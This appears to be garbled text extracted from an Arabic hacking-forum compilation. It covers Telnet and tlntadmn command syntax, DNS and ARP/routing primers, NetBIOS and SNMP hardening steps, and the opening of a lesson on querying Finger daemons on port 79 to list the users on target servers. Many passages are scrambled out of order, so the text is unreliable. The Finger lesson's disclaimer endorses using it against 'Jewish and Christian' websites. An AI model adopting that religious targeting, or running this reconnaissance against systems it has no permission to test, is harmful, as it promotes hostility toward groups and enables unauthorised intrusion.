‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .Telnet‬‬ ‫لعرض العدادات الحالية لعميل ‪Telnet‬‬ ‫‪46‬‬ .‬‬ ‫ملحظات‬ ‫يمكنك اختصار هذا المر إلى ‪."?Are you there‬‬ ‫‪esc‬‬ ‫إرسال حرف الهروب الحالي‪.‬‬ ‫‪ip‬‬ ‫مقاطعة أمر العملية‪.‬‬ ‫‪ayt‬‬ ‫إرسال أمر "‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.c‬‬ ‫أمثلة‬ ‫لقطع التصال من ملقم بعيد ‪ ،Redmond‬اكتب‪:‬‬ ‫‪c redmond 44‬‬ ‫لرسال أوامر عميل ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[?] [send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬‬ ‫‪ao‬‬ ‫إحباط أمر الخراج‪.‬‬ ‫‪synch‬‬ ‫أداء عملية تزامن ‪.

[+CTRL‬للعودة إلى جلسة عمل ‪ ،Telnet‬اضغط ‪.Telnet‬إذا كنت في جلسة عمل ‪) Telnet‬بعبارة‬ ‫ل بملقم ‪ ،(Telnet‬يمكنك الخروج من جلسة عمل ‪ Telnet‬لتعديل المعلمات بضغط‬ ‫أخرى‪ ،‬إذا كنت متص ً‬ ‫‪ .‫بناء الجملة‬ ‫‪display‬‬ ‫المعلمات‬ ‫بل‬ ‫ملحظات‬ ‫يسرد المر ‪ display‬معلمات التشغيل الحالية لعميل ‪ .2000‬ل يمكنك‬ ‫‪47‬‬ .Telnet‬‬ ‫‪stop‬‬ ‫إيقاف تشغيل ملقم ‪.Telnet‬‬ ‫‪pause‬‬ ‫مقاطعة ملقم ‪.ENTER‬‬ ‫إدارة ملقم التلنت المحلي بالـ ‪tlntadmn‬‬ ‫لدارة كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .Telnet‬‬ ‫‪continue‬‬ ‫استئناف ملقم ‪.Telnet‬‬ ‫ملحظات‬ ‫ل من جهازي‬ ‫يمكنك إدارة كمبيوتر عن بعد يشغل ملقم ‪ Telnet‬باستخدام الوامر ‪ tlntadmn‬إذا كان ك ً‬ ‫الكمبيوتر يشغلن نفس نظام التشغيل فإذا المطلوب ويندوز ‪ 2000‬استخدمه بي ويندوز ‪ .‬‬ ‫‪start‬‬ ‫بدء تشغيل ملقم ‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.

‬يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من ‪10‬‬ ‫مليين‪.‬‬ ‫كمبيوتر يشغل ‪ Windows XP‬مث ً‬ ‫لتعيين الحد القصى لعدد التصالت على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬‬ ‫‪maxfail=PositiveInteger‬‬ ‫تعيين الحد القصى لمحاولت تسجيل الدخول الفاشلة المسموح بها للمستخدم‪ .‫استخدام الوامر ‪ tlntadmn‬لدارة كمبيوتر عن بعد يشغل ‪ Windows 2000‬وملقم ‪ Telnet‬من‬ ‫ل‪.‬يجب عليك تحديد هذا العدد‬ ‫بواسطة عدد صحيح موجب أصغر من ‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫لتعيين العدد العظمي لمحاولت تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬‬ ‫‪maxconn=PositiveInteger‬‬ ‫تعيين العدد العظمي للتصالت‪ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.100‬‬ ‫لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫‪48‬‬ .

‬‬ ‫‪timeout=hh:mm:ss‬‬ ‫تعيين فترة المهلة بالساعات‪ ،‬والدقائق‪ ،‬والثواني‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫دائمًا يستخدم الـ ?‪ /‬لعرض التعليمات في موجه الوامر‪..‫تحديد اسم الملقم الذي تريد إدارته‪ ...‬‬ ‫انتهى‪،،،‬‬ ‫" معلومات عن الـ ‪" DNS‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< Dark Devil :‬‬ ‫قبل ان نبدأ دعونا نعقد اتفاق معا ‪:‬‬ ‫فلننسا كلمه هكر و لنبدأ فى تعلم الشياء التى توصلنا لكلمه هكر بمعنى الكلمه و طبعا الهكر ليس معنا‬ ‫تروجن هورسس او سب سفن ‪.‬الخ‬ ‫الهكر الحقيقى هو تعلم نظم التشغيل مثل اللينكس و اليونكس و تعلم لغات تصميم المواقع بجانب بعض لغات‬ ‫البرمجه التى يكون اهمها فى مجالنا هى لغه السى ‪C‬‬ ‫و الن دعونا من كل هذه الخلبيط و لنبدأ التكلم فى المفيد‪:‬‬ ‫نحن فى بعض الحيان نسمع عن اشياء كثيره و لكن ل نعرف ما هى و ل نحاول ان نكتشف و نعرف ما هى‬ ‫و فى هذا الملف سوف نتكلم عن شئ نسمع عنه كثيرا و لكن معظمنا ل يعرف‬ ‫ما هو ‪:‬‬ ‫و هذا الشئ هو ال ‪:DNS‬‬ ‫و سوف نبدأ بالتحدث عن هذا السم الذى يسمعه الكثيرين و لكن ل يعرفون ما هو ‪:‬‬ ‫و لنبدأ بالسؤال نفسه‬ ‫==================================================‬ ‫=========================‬ ‫ما هو ال ‪?DNS‬‬ ‫‪49‬‬ ...

‬‬ ‫‪:THE DNS SERVER‬‬ ‫================‬ ‫ال ‪ DNS SERVER‬هو عباره عن كمبيوتر و يعمل عادتا على نظام ‪ UNIX‬او النظم الشبيهه باليونكس‬ ‫و يستخدم برنامج اليونكس ‪ BIND‬اى )‪ .(Berkeley Internet Name Domain‬و يوجد ايضا‬ ‫برامج مثل هذه للويندوز و الماكنتوش ايضا‬ ‫اذا اراد احد استعمالهم ك ‪ DNS SERVER‬و لكن الكل يفضل ال ‪.‬‬ ‫و قبل هذا سيسئل ال ‪ daemon program‬فى جداوله اى فى ذاكره متصفحك عن الموقع الذى تطلبه‬ ‫فأذا لم يجده ينتقل الى ما سبق شرحه و هكذا تتم العمليه‪. UNIX‬‬ ‫و يتكون برنامج ال ‪ DNS‬من جزئين ‪:‬‬ ‫‪ (the name server itself (the daemon program that listens to port 53‬و الخر‬ ‫يسمى ‪RESOLVER‬‬ ‫و ال ‪ NAME SERVER‬هذا يستجيب الى متصفحك عندما تطلب معلومه معينه فمثل عندما تفتح‬ ‫النترنت اكسبلورر و تكتب او تطلب منه موقه معين مثل‬ ‫‪ /http://www.‬‬ ‫‪:THE TREE INFORMATION‬‬ ‫======================‬ ‫و الن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم ‪ IP‬معين من المتصفح حقك و ل يجده فى ال ‪DNS‬‬ ‫‪50‬‬ .SRI-NIC‬‬ ‫و طبعا مع تطور النترنت الرهيب و السريع بدأ هذا النظام فى الفشل و بدأو يبحثون عن النظام المثل الذى‬ ‫يستطيع التحكم فى الهوست و الى بى‬ ‫معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظهر ال ‪ DNS‬ليفعل ذلك‪.‬‬ ‫هذا بالنسبه لمعلومات عامه عن ال ‪ DNS‬و كيف كان النظام قبل اكتشافه و هى ايضا نظره عامه عن حركه‬ ‫النترنت القديمه ‪.‫==============‬ ‫اول ‪ DNS :‬هو اختصار لكلمه ‪ .(Network Information Center (SRI-NIC‬و كان على هذا الراعى ان‬ ‫يجدد )‪ (UPDATE‬الجدول هذا حوالى كل اسبوع و يمده بالعنواوين الجديده و الرقام التى ظهرت و على‬ ‫السيستم ادمين ان يجدد هو الخر ملفه او‬ ‫عن طريق اتصال ال ‪ FTP‬بينه و بين الراعى اى ‪.‬‬ ‫و ال ‪ DNS‬ليس له مركز اى ‪ decentralized‬اى انه ليس هناك ماكينه او سيستم معين يتحكم فى كل‬ ‫ال ‪ DNS‬بل بالعكس فال ‪ DNS‬عباره عن داتا بيز‬ ‫موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر عليه ‪ DNS‬يعرف اين يبحث عندما يريد ان‬ ‫يحصل على معلومه معينه او هوست معين‪.burn.burn.com‬فسيسئل المتصفح اقرب ‪ DNS‬موجود له )و هذا يعتمد على اتصالك‬ ‫بالشبكه و رقم الى بى الخاص بك( عن عنوان ال ‪ IP‬ل ‪/http://www.0.burn.0.com :‬الى ‪ IP ADRESSES‬مثل ‪ 127. (IP‬‬ ‫و كان السم المستعمل ل ال ‪ address resolution‬قبل ال ‪ DNS‬كان يتكون من ملف اسمه ال‬ ‫‪ HOST FILE‬و كان عباره عن اسماء الهوستس اى المواقع‬ ‫و عنواوين ال ‪ IP‬الخاصه بهم و كان هذا الملف تتولى رعايته ‪Stanford Research Institute's‬‬ ‫‪ . Domain Name System‬و يتصل سرفر ال ‪ DNS‬عادتا على‬ ‫بورت ‪ 53‬مما يعنى انك اذا اردت التصال الى احد المواقع و استعملت ال ‪ DNS‬حقه فسوف تتصل‬ ‫به عن طريق البورت ‪ 53‬و سوف يترجم او يحول ال ‪ translates alphabetical hostnames‬و‬ ‫يعنى اسم الموقع مثل ‪ /http://www.com‬‬ ‫لن المتصفح يحتاج هذا ال ‪ IP‬ليجد السرفر الذى لديه هذا الهوست اى هذا الموقع و يطلب محتويات الموقع‬ ‫من السرفر ليعرضها لك فى متصفحك‪. address resolution‬و لكن قد ظهر ال ‪ DNS‬لجعل‬ ‫توزيع الهوستس اسهل بكثير من الماضى حيث انه من‬ ‫السهل ان تتذكر اسم موقع معين تريده افضل من ان تتذكر اربعه خانات من الرقام )‪.1‬و‬ ‫العكس صحيح و عندما تتم العمليه‬ ‫تتصل بالموقع مباشره‬ ‫و عمليه التحويل هذه تسمى ‪ address resolution‬اى تحويل او تحليل عنوان الموقع الى ‪ IP‬او‬ ‫العكس لنستطيع التصال به‬ ‫و قبل ظهور ال ‪ DNS‬كان اسم اخر لعمليه ال ‪.

uk‬الى ‪ some-organization.uk.uk‬او ‪school.co.co.co.isp. airforce.DNS SERVERS‬‬ ‫و طبعا نتيجه من هذا التصال فنستنتج وجود شجره اتصال و معلومات و لكن كيف تعمل بالضبط‬ ‫دعونا نأخذ مثال ‪:‬‬ ‫لو فرضنا ان ال ‪ ISP‬الخاص بك كان مثل ‪ isp.uk‬و الخ و هناك امثله كثيرا طبعا و كل‬ ‫شئ ينتهى ب ‪ UK‬و اذا لم يجده ايضا فى كل الماكن المتاح له البحث فيها فسيرجع المتصفح الى اكبر‬ ‫‪ DNS‬موجود على الشبكه و اسمه ال ‪ ROOT‬فهو يحتوى على كل عناوين ال ‪ IP‬على كل للمواقع‬ ‫الموجوده على اى ‪.‬اذا كان ال ‪ ISP‬الخاص بك يحنوى على ال ‪ IP‬الذى طلبته‬ ‫فسوف يحتاج فقط الى اجزاء من الثانيه ليأتى به لك و يعرضه فى متصفحك‪ .‬‬ ‫ارجو ان اكون قد افدتكم جميعا بهذه المعلومات التى هى بعيده عن الهكر و لكنها اساس فى تعلم الهكر يا‬ ‫اصدقائى و كما قلت لكم الهكر ليس التروجان و الباتشات الهكر هو تعلم اساليب البرمجه و كيفيه تصميم‬ ‫المواقع و معرفه كل شئ جديد فى عالم النترنت و ارجو من المحترفين الدخول و قرائه الموضوع و تصحيح‬ ‫الخطاء التى به حتى يكون موضوع كامل و متكامل خالى من الخطاء و نتظر ردودكم و تفاعلكم مع‬ ‫المعلومات و اى سؤال انا موجود على قد مقدرتى‬ ‫و انتظرو موضوعى القادم و هو معلومات عن ال ‪ SSL‬و سنعرف ما هو بالتفصيل‬ ‫و السلم عليكم و رحمه ال و بركاته‪.‬و فى حاله انه ل‬ ‫يجده سوف تأتيك رساله من متصفحك تقول ‪ address could not be found‬و هذا يحدث نتيجه‬ ‫اعطاء المتصفح ‪ HOST‬او ‪ IP‬خطأ ليبحث عنه و بالتالى طبعا فهو ليس موجود من الساس ليعرضه او‬ ‫نتيجه طول البحث فيقوم متصفحك بقدان التصال مع ال ‪ DNS‬اى عمليه ‪.ac.uk‬و هذا يعتمد على اتصالك بالنترنت اى حسب‬ ‫الشركه و السرفر الذى تشبك عليه فمن الطبيعى طبعا ان يكون ال ‪ISP's DNS server's‬‬ ‫‪ hostname‬مثل هذا ‪ dns.uk‬و الن فالنفرض انك سألت هذا ال ‪ DNS‬ليبحث لك عن ‪IP‬‬ ‫الخاص ب ‪ /http://www.isp.‬اما اذا انتقل المتصفح للبحث‬ ‫فى مستوى اعلى من ال ‪ DNS‬فسوف يحتاج الى قليل من الوقت يمتد حتى ‪ 15‬ثانيه ‪ .mil.‬‬ ‫‪ university.com‬مثل فسيقوم هذا ال ‪ dns.edu.‫المحلى اى الخاص بك سوف يسأل ال ‪ DNS SERVER‬العلى منه فى المستوى عنه ليجده و اذا لم يجده‬ ‫فى مستوى اعلى فينتقل للبحث فى مستوى اعلى و اعلى و هكذا يسير البحث من القل الى العلى فى‬ ‫مستويات ال ‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪51‬‬ .uk.uk‬بالبحث فى جداوله‬ ‫المحليه المخذنه فى الذاكره عنده فيجدها و اذا لم يجدها فسينتقل كما قلنا الى مستوى اعلى من ال ‪DNS‬‬ ‫‪ SERVER‬ليبحث فيه و اذا لم يجده ايضا فى المستوى العلى فعليه ان يقوم بتغيير مكان البحث كليا فمثل‬ ‫من ‪ dns. TIMED OUT‬‬ ‫و فى هذه الحاله نضغط فى المتصفح على ‪ REFRESH‬او ‪ RELOAD‬طبعا حسب متصفحك ‪.burn.uk.isp.DOMAIN NAME‬‬ ‫‪?When and why does DNS "hang" or fail‬‬ ‫======================================‬ ‫و يمكن ايضا لل ‪ DNS‬ان يكون بطئ او سريع ‪.org. england.co.gov.

‫" معلومات عن ‪" Routing in the Internet‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< Dark Devil :‬‬ ‫السلم عليكم و رحمه ال و بركاته‪:‬‬ ‫سوف نتكلم يا اصدقائى عن شئ مهم فى علم الشبكات و الكثير منكم على غير علم به و هذا الشئ هو ال‬ ‫‪.‬‬ ‫و فى سياق النترنت يوجد ثلث مظاهر من الروتنج وهم‪:‬‬ ‫‪Physical Address Determination-1‬‬ ‫‪Selection of inter-network gateways-2‬‬ ‫‪Symbolic and Numeric Addresses-3‬‬ ‫‪52‬‬ .Routing‬‬ ‫و الن دعونا نبدأ و اتمنى ان يعجبكم الموضوع و تستفيدون منه‪:‬‬ ‫‪:Routing in the Internet‬‬ ‫=========================‬ ‫‪!?what is routing‬‬ ‫الروتنج هو عباره عن تكنيك او ميكانزم الذى عن طريقه تنتقل المعلومات من كمبيوتر الى اخر او من‬ ‫هوست الى اخر‪.

‬و هذا يتم بنجاح و ببساطه عن طريق استخدام جدول سوف‬ ‫يوضح كيفيه تحويل ال ‪ ip‬الى ‪ .131.‬‬ ‫و الثالث من المذكور هو الذى يتضمن انتقال العنوان اى ال ‪ address translation‬من الشكل الكتابى‬ ‫الذى نعرفه و نستطيع التعرف عليه بسهوله و المقصود مثل عنوان المتصفح اى‬ ‫‪ /http://www. cache‬‬ ‫و للحصول على الجدول نستخدم امر ‪ arp -a‬و فى اليونكس ايضا نستخدم نفس المر‪.‬فمن الدرورى ان نغلف هذه‬ ‫الداتا الخاصه بال ‪ ip‬بأى أطار من اى صيغه تكون متصله بالنت ورك المحليه للجهاز او بالنت ورك المتصل‬ ‫بها الجهاز فى حالته الموجود عليها عند انتقال هذه الداتا‪.‬و تحديد المدخل الملئم و البورت لتفصيل داتا ال ‪ ip‬هذا ما نسميه روتنج اى ‪ routing‬و تتضمن‬ ‫ايضا داخل تبادل المعلومات بطرق معينه‪.com‬الى ‪ ip‬اى الى اشياء رقميه معقده صعبه و تؤدى هذه المهمه عن طريق ال‬ ‫‪) DNS‬ارجو مراجعه موضوعى الول عن ال ‪ DNS‬للستفاده اكثر (‪.gateways‬و هذه المداخل عموما‬ ‫تسمى بالروترس اى ال ‪.17‬‬ ‫‪dynamic 20-53-52-43-00-00 213.burn.238‬‬ ‫النترنت ادرس الموجود امامكم هذا هى عناوين كل الشبكات المتصله بجهازى بعد دخولى الى النترنت‬ ‫و ال ‪ Physical Address‬اعتقد انكم تلحظون انه ثابت ل يتغير و بهذا يمكننا ان نقول و نوضح لكم ان‬ ‫ال ‪ Physical Address‬هذا هو ال ‪ Mac Address‬اى رقم الجهاز نفسه الذى تتصل به النتوركس‬ ‫اثناء العمل و لذلك فقد قلت فى كلمى ان تحديد ال ‪ Physical Address‬مهم جدااا فى عمليه نقل‬ ‫معلومات او داتا ال ‪ ip‬لنه بدون ‪ Physical Address‬اذن فكيف ستتعرف الباكيدجس الموجوده فى ال‬ ‫‪ router‬على طريقها‪.‬و لنجاح هذا النتقال فى ظل الغليف بهذا الطار من الدرورى ان نحدد ما يسمى بال‬ ‫‪ physical address‬لتجاه الكمبيوتر‪ .‬‬ ‫و للحصول على هذا الجدول و قرائته من الطبيعى ان يكون الكمبيوتر يستخدم بروتوكول معين للحصول على‬ ‫هذا الجدول و تحويل ال ‪ ip‬الى ‪ physical addresses‬و هذا البروتوكول يعرف بأسم ‪ ARP‬اى‬ ‫‪ Address Resolution Protocol‬اى بروتوكول تحليل الدرس و اعتقد اننا الن ادركنا و فهمنا‬ ‫معنى كلمه تحويل ال ‪ ip‬الى ‪ . physical addresses‬فمثل هذا الجدول يحتوى على عناوين ال ‪ip‬‬ ‫للنتوركس و الدرس او العنوان المعروف لها ‪.‬‬ ‫و الن ندخل فى شرح عمليه تحديد ال ‪ Physical Address‬اى ‪:‬‬ ‫‪:Physical Address Determination‬‬ ‫===============================‬ ‫اذا كان يريد جهاز كمبيوتر ان ينقل ‪ ip data‬اذن فأنه يحتاج الى ان يغلف بأطار مخصص و تابع للنتورك‬ ‫المتصل الجهاز بها‪ .‬‬ ‫‪53‬‬ .‫و يعتبر الول فى هذه الشياء هو المهم عندما تنتقل داتا ال ‪ ip‬من الكمبيوتر‪.‬‬ ‫و هذا مثال حى من جهازى على الجدول الذى يظهر بعد تنفيذ المر ‪:‬‬ ‫‪C:\WINDOWS>arp -a‬‬ ‫‪Interface: 62.(local network address or physical address within the frame‬‬ ‫و الشئ الثانى من المذكور اعله مهم ايضا و درورى لن النترنت تتكون من عدد من النت وركس المحليه‬ ‫اى ‪ local networks‬مربوطه بواحد او كثير من المداخل اى ال ‪. routers‬احيانا يكون لها اتصالت فيزيائيه او بورتات مع الكثير من النت‬ ‫وركس ‪.‬‬ ‫و ال ‪ type‬هذا مكتوب ‪ dynamic‬اى انه غير ثابت بمعنى انه يتغيير عند عمل ريستارت لكل مره فى‬ ‫الجهاز و لكنه يثبت اثناء العمل على النترنت ‪.226.46.64.131.2‬‬ ‫‪dynamic 20-53-52-43-00-00 213.9.‬و يتطلب هذا الغلف التضمين من ال عنوان النت‬ ‫ورك المحليه او العنوان الفيزيائى لهذا للشبكه مع الطار الذى يحيط بالبيانات اى )‪inclusion of a‬‬ ‫‪.135. physical addresses‬و يمكن ان نعرف هذا الجدول بأسم ‪ARP‬‬ ‫‪.65.102 on Interface 0x2‬‬ ‫‪Internet Address Physical Address Type‬‬ ‫‪dynamic 20-53-52-43-00-00 207.

‫و هناك النوع الخر و هو ال ‪ static‬اى الثابت الذى ل يتغير "هذا فقط للتوضيح"‬ ‫اعتقد الن اننا فهمنا بمعنى بسيط ما هو الروتنج و ما هى ال ‪routers‬‬ ‫انتهى‪،،،‬‬ ‫" ‪" NETBIOS‬‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫بعد قراءة هذا الموضوع ستكون قادر على‬ ‫•‬ ‫•‬ ‫•‬ ‫صد الجلسات الخالية‬ ‫منع تعداد المستخدمين‬ ‫منع تعداد الـ ‪SNMP‬‬ ‫يوجد في العداد الفتراضي للويندوز اعتماد على ‪ NetBIOS‬وهي مشكلة كبيرة لصحاب الشبكات المهمة لن الـ‬ ‫‪ NetBIOS‬لها واجهات تداخل ‪ API‬تعيد وترجع معلومات حول الهدف من خلل المنفذ ‪ 139‬لـ ‪ ، TCP‬وفي الحالة‬ ‫الفتراضية يكون الوصول ممكن حتى من مجهولين الهوية ‪ ،‬وطبعا هذا يكون فيه خطرًا قد يكون كبير عند استخدامه من‬ ‫محترفين الولوج على أنظمة ‪NT‬‬ ‫تستطيع أن تلغي كل خدمات ‪ NetBIOS‬على جهاز ما عندما تجد أنها غير ظرورية لك ويكون ذلك من خصائص ‪ TCP/IP‬ثم من‬ ‫‪ Advanced‬ثم من التبويب ‪ WINS‬ثم تعلم على الخيار الواضح في المثال التالي‬ ‫‪54‬‬ .

‬‬ ‫ولمشاهدة شرح ميسر من ‪..‬‬ ‫وتوجد بعض الدوات المتاحة على النترنت تقوم بنفس العمل بشكل احترافي منها هذه الداة المدعوه ‪ Nbtscan‬وهي أيضًا اداة سطر‬ ‫أوامر وتستطيع أن تحملها من ‪...‬‬ ‫وتوجد أدوات رسومية شعبية كثيرة على النترنت للقيام بنفس العمل منها على سبيل المثال البرنامج ‪، Legion‬‬ ‫‪‬‬ ‫الحل المريح‬ ‫‪55‬‬ .‫ل مناسبًا وهى تدعى ‪ RestrictAnonymous‬وهي تحد بشكل كبير‬ ‫وإذا كانت هذه الخدمة مهمة لك فقد قدمت شركة مايكروسوفت ح ً‬ ‫من تسرب المعلومات عبر الوصلت المجهولة ‪ ،‬وتستطيع الوصول إليها من ‪ Administrative TOOLS‬ثم من ‪Local Security‬‬ ‫‪ policy‬ثم من النافذة نختار ‪ Local poicies‬ثم من ‪ security options‬ثم نعلم على الخيار الول ‪Additional restrictions‬‬ ‫‪ for anonymous connections‬ثم بالزر اليمن نختار ‪ security‬ثم من النافذة نختار من الشريط المنزلق الخيار ‪No Access‬‬ ‫‪ Without Explicit Anonymous Permissions‬مثل المثال‬ ‫بعض المثله لستخدام أدوات الـ ‪NetBIOS‬‬ ‫‪‬‬ ‫‪Net View‬‬ ‫هذه الداة مضمنه ضمن نظام التشغيل نفسه وهي أداة سطر اوامر على ‪ NT/W2000‬وهي تعرض الميادين المتاحة وكل الجهزة على‬ ‫هذه الميادين وكل الخدمات المتاحة لتشارك على الجهزة ‪ ،‬ويكفي أن تكتب عنوان ‪ IP‬أو اسم الدومين حتى تكون قد حصلت على ما‬ ‫تريد‬ ‫ولمعرفة المزيد عن إستخدامات المر ‪ Net‬في إدارة‬ ‫الشبكة انقر ‪..

‫الحل المريح لتخلص من هذا الصداع هو حماية المنافذ المقدمه من البروتوكول ‪ TCP‬و البروتوكول ‪ UDP‬عبر المنافذ من ‪ 135‬إلى‬ ‫المنفذ ‪ ، 445+ 139‬وكل برامج الجدران النارية المتقدمة تستطيع من خللها أن تتحكم بالمنافذ بشكل مريح ‪ ،‬وشاهدنا كيف نلغي‬ ‫الخدمة ‪ NetBIOS‬أو نقلل من المشاكل المحتمله منها ‪ ،‬ورغم كل ذلك لزال الخطر موجودًا إذا كنت تستخدم البروتوكول ‪SNMP‬‬ ‫لدارة الشبكة على ويندوز ‪ 2000‬سيرفر ‪ ،‬فهذا البروتوكول يمرر كل المعلومات المطلوبة إذا كان مثبتا ‪ ،‬ولتأمين هذا البروتوكول بالشكل‬ ‫المطلوب أمامك خيارين الول‬ ‫حذف اسم المجموعة ‪ Public‬التي تكون عند التثبيت الفتراضي وتكون أسماء مخصصة من مستخدمين الشبكة كما في المثال‬ ‫المجموعة ‪ public‬موجودة علم عليها ثم من الزر ‪ Remove‬ثم حرر المربع ‪Send authentication trap‬‬ ‫بذلك تكون قد حصرت استخدام هذا البروتوكول للشخاص المختارين فقط‬ ‫والحل الثاني من محرر السجل ‪regedit‬‬ ‫‪HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent‬‬ ‫ل إ ذا كان ما حذفته رقمه = واحد أعد الترقيم‬ ‫ثم قم بحذف المفتاح ‪ LANManagerMIB2Agent‬ثم قم بإعادة ترقيم المدخلت مث ً‬ ‫ليبدأ من واحد للمدخل رقم ‪2‬‬ ‫هل تعلم أن‬ ‫البروتوكول ‪ TCP/IP‬يستطيع العمل بشكل سليم بدون خدمات الـ ‪ ، NetBIOS‬لذلك إذا كنت‬ ‫غير محتاج إليه تعطيله أفضل‬ ‫ةةةةةةةة‬ ‫‪56‬‬ .

2‬مقدمة عن ‪Finger‬‬ ‫>===================<‬ ‫ن ‪ Finger‬ديمون خدمة تعمل عن طريق البورت ‪ 79‬عادة وكانت‬ ‫إّ‬ ‫مستخدمة أصل كنوع ‪ businesscard‬رقمي للناس‪.3‬استخدام ‪Finger‬‬ ‫‪ 1.2‬مقدمة عن ‪Finger‬‬ ‫‪ 1.1‬تبرئة‪:‬‬ ‫>=========<‬ ‫هذا الدرس فقط للتعليم والتطبيق على مواقع اليهود والنصاري الضاره للمسلمين‬ ‫فالكاتب ل يتحمل اي مسؤولية للستخدام السيء لهذا الدرس ضد أخواننا المسلمين‪.1‬تبرئة‬ ‫‪ 1.‬‬ ‫‪57‬‬ .‬‬ ‫المستخدم البعيد)‪ ( remote user‬يمكن أن يرسل طلب إلى ‪ Finger‬ديمون يجري على نظام معين‬ ‫)بورت ‪ Finger‬نوعية ‪ (79‬وسيحصل على إجابة‪.‬‬ ‫‪ 1.7‬الختام‬ ‫‪ 1.4‬بعض الخدع عند استخدام خدمة ‪Finger‬‬ ‫‪ 1.‫" بروتوكول خدمة ‪"Finger‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫>ةةةةةة‪<LAMeR :‬‬ ‫السلم عليكم ورحمة ال وبركاته‬ ‫اتمنى انكم تتقبلون مني هذا الدرس عن بروتوكول خدمة ‪ Finger‬التي تعمل على بورت ‪79‬‬ ‫بسم ال نبدأ الدرس‬ ‫فهرس محتويات الدرس‬ ‫>================<‬ ‫‪ 1.5‬الستعلم عن طريق موقع بأستخدام ‪Finger‬‬ ‫‪ 1.‬‬ ‫هذه الجابة ستخبرك من هم المستخدمين على هذا النظام و أيضا‬ ‫بعض المعلومات عن هؤلء المستخدمين المتصلين بالنظام‪.6‬الستنتاج من هذا الدرس‬ ‫‪ 1.

‬‬ ‫ملحظة ‪ :‬النظام) ‪ ( server‬هو جهاز كمبيوتر تخزن فيه معلومات هائلة ويستخدم في استضافة المواقع‬ ‫‪ 1.foobar.‬بدون أ ّ‬ ‫ن ‪ Finger‬ديمون‪ ،‬مثال عظيم لخدمة‬ ‫لذلك إ ّ‬ ‫ساسة‬ ‫يمكن استخدامها قانونيا لتزودك بكمية ضخمة من المعلومات الح ّ‬ ‫حول هدف‪.foobar.‬‬ ‫قديما استخدم الناس التصال على جميع انواع النظمة في العالم وطلب الستعلم عن هذه النظمة و الـ‬ ‫‪ Finger‬كان يعطيهم معلومات عن‬ ‫من هم الموجودون في النظام وهل لهم حسابات في هذا النظام‪.com‬ووجدت به منفذ )‪ Port‬بورت( ‪ 79‬مفتوحا‬ ‫هذا يعني ان ‪/http://www.foobar.‬‬ ‫الن كيف نقوم بـ)‪ (request‬طلب استعلم؟‬ ‫عن طريق وندوز‬ ‫في أغلب الحيان وندوز ل يوجدبه زبون )‪ (client‬خاص للـ ‪ Finger‬مركب ) ‪( installed‬‬ ‫لذلك سوف نستخدم ‪ Telnet‬كخادم لـ ‪Finger‬‬ ‫‪-‬توضيح‪--‬‬‫‪Telnet(client) --------request-------> Finger Deamon(in Server) o‬‬ ‫عن طريق كتابة السطر التي في موجة الدوس )‪: ( MS DOS‬‬ ‫‪telnet http://www.‬وكان ‪ Finger‬يستخدم قديما في‬ ‫الجامعات و الشركات الكبيرة أيضا‪.‬‬ ‫في الماضي ‪ ،‬الـ ‪ Finger‬إستعمل عامة عن طريق الطلب في الجامعات‬ ‫اذا ارادوا معلومات تخص طلب اخرين في نفس الجامعه‬ ‫وكثيرا ما تكون الجابة )اجابة ‪ ( Finger Deamon‬بجملة " ‪ " !Finger me‬اي "أعلمني ! "‬ ‫أما الن ومع وجود شبكة النترنت العالمية اصبح ‪Finger‬‬ ‫أقل شهرة ‪ ،‬لنه توجد الن‬ ‫مواقع الويب للعمل كبطاقة عمل)‪ (bisinesscard‬رقمية خاصة بمستخدمين النترنت وبسبب ملحظة‬ ‫الناس‬ ‫التهديد الواسع للمن اللكتروني قّل استخدام خدمة ‪Finger Deamon‬‬ ‫على أية حال‪،‬‬ ‫ليس كل النظمة منعت هذه الخدمة وستجد بعض المواقع ) النظمة( تقدم هذه الخدمة‪.3‬استخدام ‪Finger‬‬ ‫>=================<‬ ‫عند استخدام اي من برامج السكان المعروفة مثل 